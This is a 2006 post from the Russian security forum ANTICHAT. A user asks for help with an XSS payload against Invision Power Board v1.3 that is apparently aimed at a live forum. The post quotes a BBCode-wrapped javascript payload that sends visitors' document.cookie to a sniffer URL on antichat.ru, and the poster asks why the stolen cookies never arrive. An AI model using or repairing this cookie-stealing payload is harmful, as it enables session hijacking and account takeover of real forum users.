Про уязвимости в Invision Power Board(U) v1.3 Final...

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#11

12.08.2006, 16:18

oOLokiOo

Новичок

Регистрация: 08.08.2006

Сообщений: 14

Провел на форуме:
24267

Репутация: 1

Я короче сглупил... Меня спутало - session_id в снифире, я пытался догнать как эту одну строку распихать по (member_id, pass_hash, forum_read)

Теперь я уже в курсе про сесии...

Ладно, к сути:
1.) Примеры с XSS прокатят только в IE?

2.) Я перепробовал все XSS примеры из темы - "Обзор уязвимостей Ipb", (хоть как-то)преобразовался только один (цвет я добавил от себя):
[color=#eef2f7]
[H*TML][E*MAIL][U*RL=wj`=`][/U*RL][/E*MAIL][/c*olor][c*olor=#eef2f7]` style=`background:url(javascript:document.images [1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/c*olor]
, но куки всёравно не отсылаються на снифер

Посмотрел в код страницы:
 [HTML]<A href="http://wj`=`/" target=_blank></A>` style=`background:url(javascript:document.images 1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`
Походу нифига не преобразовалось...
Что делать?
qBiN в своей статье писал что это прокатывает в 9и из 10и форумов, неужели я попвл в 10ый?

З.Ы. Кстати на "моём" форуме есть только таки тэги:
[U*RL][I*MG][E*MAIL][Q*UOTE][C*ODE][L*IST][B*][I*][U*]
Форум - Invision Power Board(U) v1.3 Final
Может поможет чем...

Последний раз редактировалось oOLokiOo; 12.08.2006 в 16:20..